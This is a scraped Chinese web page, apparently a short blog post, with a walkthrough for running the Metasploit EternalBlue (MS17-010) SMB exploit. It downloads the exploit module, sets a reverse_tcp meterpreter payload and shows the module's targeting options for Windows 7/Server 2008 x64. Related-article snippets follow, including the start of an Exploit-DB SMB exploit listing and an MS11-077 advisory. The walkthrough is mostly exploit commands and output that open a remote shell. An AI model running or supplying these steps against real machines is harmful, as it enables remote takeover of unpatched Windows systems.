MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 2017-05-18 16:45

wget "https://raw.githubusercontent.com/rapid7/metasploit-framework/6d81ca42087efd6548bfcf924172376d5234a25a/modules/exploits/windows/smb/ms17_010_eternalblue.rb" -O /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

参考:

https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 (x64) All Service Packs

  

时间: 2024-09-28 17:57:16

MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 2017-05-18 16:45的相关文章

Windows kernel pool 初探(2014.12)

Windows kernel pool 1. 简介 Kernel pool类似于Windows用户层所使用Heap,其为内核组件提供系统资源.在系统初始化的时候,内存管理模块就创建了pool. 严格的来说,pool只分为nonpaged pool和paged pool两类. nonpaged pool: 只能常驻于物理内存地址,不能映射.(reside in physical memory at all times and can be accessed at any time without

Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution

EDB-ID: 41929 Author: vportal Published: 2017-04-25 CVE: N/A Type: Remote Platform: Windows Aliases: ERRATICGOPHER Advisory/Source: N/A Tags: N/A E-DB Verified:  Exploit:  Download/ View Raw Vulnerable App: N/A #!/usr/bin/env python # -*- coding: utf

How to mount remote Windows shares

  Contents Required packages Basic method Better Method Even-better method Yet Another Even-better method OK, we live in the wonderful world of Linux. BUT, for many of us, having to deal with Windows is a fact of life. For example, you may want to us

Windows Kernel Security Training Courses

http://www.codemachine.com/courses.html#kerdbg Windows Kernel Internals for Security Researchers This course takes a deep dive into the internals of the Windows kernel from a security perspective. Attendees learn about behind the scenes working of va

How to mount remote windows partition (windows share) under Linux

http://www.cyberciti.biz/tips/how-to-mount-remote-windows-partition-windows-share-under-linux.html  by nixCraft on April 26, 2004 · 64 comments· LAST UPDATED August 3, 2007 in CentOS, File system, Howto All files accessible in a Linux (and UNIX) syst

Windows Kernel Way 扉言

七年寒窗,但求一道. 笔者在学习windows/linux以及各类编程语言.框架之初因摸不到门路而磕磕绊绊,因寻不到明师而步履蹒跚,或不知缘从何起,或不知路在何处,只能尝试.回溯.重来.反反复复,竟也惶度七年有余……七年流光,物是人非,伊人不再,道也未成,每念及此,不胜唏嘘. 然光阴之美,尽在于此. 时光与梦想不可怠慢,遂决定写Kernel Way系列文章,重走来时路…… Windows Kernel Way系列包含Windows内核基本原理.Windows驱动开发.WIndows内核安全编程等

Microsoft Windows Kernel .fon字体文件远程代码执行漏洞(MS11-077)

漏洞描述 Microsoft Windows是流行的计算机操作系统. IWindows Kernel在.fon字体文件的处理上存在远程代码执行漏洞,远程攻击者可利用此漏洞以内核权限执行任意代码,导致完全控制受影响计算机. <*来源:Will Dorman 链接:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077 *> 解决方法 厂商补丁: Microsoft --------- Mi

Windows Kernel Way 1:Windows内核调试技术

掌握Windows内核调试技术是学习与研究Windows内核的基础,调试Windows内核的方式大致分为两种: (1)通过Windbg工具在Windows系统运行之初连接到Windows内核,连接成功之后便可以调试,此时即可以调试Windows内核启动过程,又可以在Windows启动之后调试某内核组件或应用程序.或使用Windbg的Kernel debugging of the local mechine功能,在Windows系统完全启动之后,调试Windows内核组件或应用程序.这种方式需要配

linux系统smb安装,windows访问smb共享文件夹和虚拟机vm与真机的互ping

直接上技!首先要明白smb是用来干什么的?后面提的虚拟机vm与真机互ping只是一个实验.这里使用的linux版本为 redhat 7.4 一.smb配置注意:在这里我们是将linux系统当做服务器的1.用来共享资源的技术2.在linux系统和windows之间共享的不二选择(优势).3.linux间也可以使用但相对ftp/nfs/等等复杂 二.在linux下安装smb过程前提yum源得存在# yum -y install samba (安装smb成功进行下一步# mkdir /common (